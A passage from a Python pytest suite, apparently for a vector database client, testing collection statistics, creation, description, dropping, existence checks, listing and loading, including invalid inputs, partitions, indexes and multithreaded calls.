collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
collection_list = []
collection_num = 20
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
for i in range(int(collection_num / 2), collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
res = connect.insert(collection_name, cons.default_binary_entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
connect.drop_collection(collection_list[i])
class TestGetCollectionStats:
"""
******************************************************************
The following cases are used to test `collection_stats` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_name_not_existed(self, connect, collection):
"""
target: get collection stats where collection name does not exist
method: call collection_stats with a random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid_stats)
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_invalid(self, connect, get_invalid_collection_name):
"""
target: get collection stats where collection name is invalid
method: call collection_stats with invalid collection_name
expected: status not ok
"""
collection_name = get_invalid_collection_name
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_empty(self, connect, collection):
"""
target: get collection stats where no entity in collection
method: call collection_stats in empty collection
expected: segment = []
"""
stats = connect.get_collection_stats(collection)
connect.flush([collection])
assert stats[row_count] == 0
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.get_collection_stats(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_batch(self, connect, collection):
"""
target: get row count with collection_stats
method: add entities, check count in collection info
expected: count as expected
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert int(stats[row_count]) == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_single(self, connect, collection):
"""
target: get row count with collection_stats
method: add entity one by one, check count in collection info
expected: count as expected
"""
nb = 10
for i in range(nb):
connect.insert(collection, cons.default_entity)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_delete(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = [ids[0], ids[-1]]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb - 2
assert stats["partitions"][0]["row_count"] == default_nb - 2
assert stats["partitions"][0]["segments"][0]["data_size"] > 0
# TODO: enable
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_parts(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, and compact collection, check count in collection info
expected: status ok, count as expected
"""
delete_length = 1000
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:delete_length]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb - delete_length
compact_before = stats["partitions"][0]["segments"][0]["data_size"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["segments"][0]["data_size"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_delete_one(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete one entity, and compact collection, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:1]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_before = stats["partitions"][0]["row_count"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["row_count"]
# pdb.set_trace()
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partition(self, connect, collection):
"""
target: get partition info in a collection
method: call collection_stats after partition created and check partition_stats
expected: status ok, vectors added to partition
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions(self, connect, collection):
"""
target: get partition info in a collection
method: create two partitions, add vectors in one of the partitions, call collection_stats and check
expected: status ok, vectors added to one partition but not the other
"""
new_tag = "new_tag"
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
connect.insert(collection, cons.default_entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 2
connect.insert(collection, cons.default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 3
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_A(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_B(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions_C(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of vectors
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_D(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the collection count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.insert(collection, entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_index_created(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_ip(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
get_simple_index["metric_type"] = "IP"
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
get_simple_index.update({"metric_type": "IP"})
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_jac(self, connect, binary_collection, get_jaccard_index):
"""
target: test collection info after index created
method: create collection, add binary entities, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
ids = connect.insert(binary_collection, cons.default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, default_binary_vec_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_create_different_index(self, connect, collection):
"""
target: test collection info after index created repeatedly
method: create collection, add vectors, create index and call collection_stats multiple times
expected: status ok, index info shown in segments
"""
result = connect.insert(collection, cons.default_entities)
connect.flush([collection])
for index_type in ["IVF_FLAT", "IVF_SQ8"]:
connect.create_index(collection, default_float_vec_field_name,
{"index_type": index_type, "params": {"nlist": 1024}, "metric_type": "L2"})
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_indexed(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: row count in segments
"""
collection_list = []
collection_num = 10
for i in range(collection_num):
collection_name = gen_unique_str(uid_stats)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
res = connect.insert(collection_name, cons.default_entities)
connect.flush(collection_list)
index_1 = {"index_type": "IVF_SQ8", "params": {"nlist": 1024}, "metric_type": "L2"}
index_2 = {"index_type": "IVF_FLAT", "params": {"nlist": 1024}, "metric_type": "L2"}
if i % 2:
connect.create_index(collection_name, default_float_vec_field_name, index_1)
else:
connect.create_index(collection_name, default_float_vec_field_name, index_2)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
index = connect.describe_index(collection_list[i], "")
if i % 2:
create_target_index(index_1, default_float_vec_field_name)
assert index == index_1
else:
create_target_index(index_2, default_float_vec_field_name)
assert index == index_2
# break
connect.drop_collection(collection_list[i])
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
"""
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
# pdb.set_trace()
connect.insert(collection, cons.default_entity)
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert_flush(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
connect.flush([collection])
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_multithread(self, connect):
"""
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(cons.default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
"""
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
logging.getLogger().info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: raise exception
"""
collection_name = gen_unique_str(uid_create)
limit_num = 64
fields = copy.deepcopy(cons.default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_without_connection(self, collection, dis_connect):
"""
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by describe_collection method
expected: False
"""
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_multithread(self, connect):
"""
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test describe collection which name invalid
method: call describe_collection with invalid names
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test describe collection which name is empty or None
method: call describe_collection with '' or None name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self, connect, collection):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self, collection, dis_connect):
"""
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, which not existed in db,
assert the exception raised returned by drp_collection method
expected: False
"""
collection_name = gen_unique_str(uid_drop)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_collection_multithread(self, connect):
"""
target: test create and drop collection with multithread
method: create and drop collection using multithread,
expected: collections are created, and dropped
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_drop)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_has_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by has_collection method
expected: False
"""
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
"""
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestListCollections:
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self, connect):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = gen_unique_str(uid_list)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
assert collection_name in connect.list_collections()
for i in range(collection_num):
connect.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self, dis_connect):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.list_collections()
# TODO: make sure to run this case in the end
@pytest.mark.skip("r0.3-test")
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_no_collection(self, connect):
"""
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
"""
result = connect.list_collections()
if result:
for collection_name in result:
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self, connect):
"""
target: test list collection with multithread
method: list collection using multithread,
expected: list collections correctly
"""
threads_num = 10
threads = []
collection_name = gen_unique_str(uid_list)
connect.create_collection(collection_name, cons.default_fields)
def _list():
assert collection_name in connect.list_collections()
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
result = connect.insert(binary_collection, cons.default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_empty_collection(self, connect, collection):
"""
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
"""
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self, connect, collection):
"""
target: test load invalid collection
method: load not existed collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self, connect, collection):
"""
target: test release a not existed collection
method: release with a not existed collection anme
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_collection(collection)
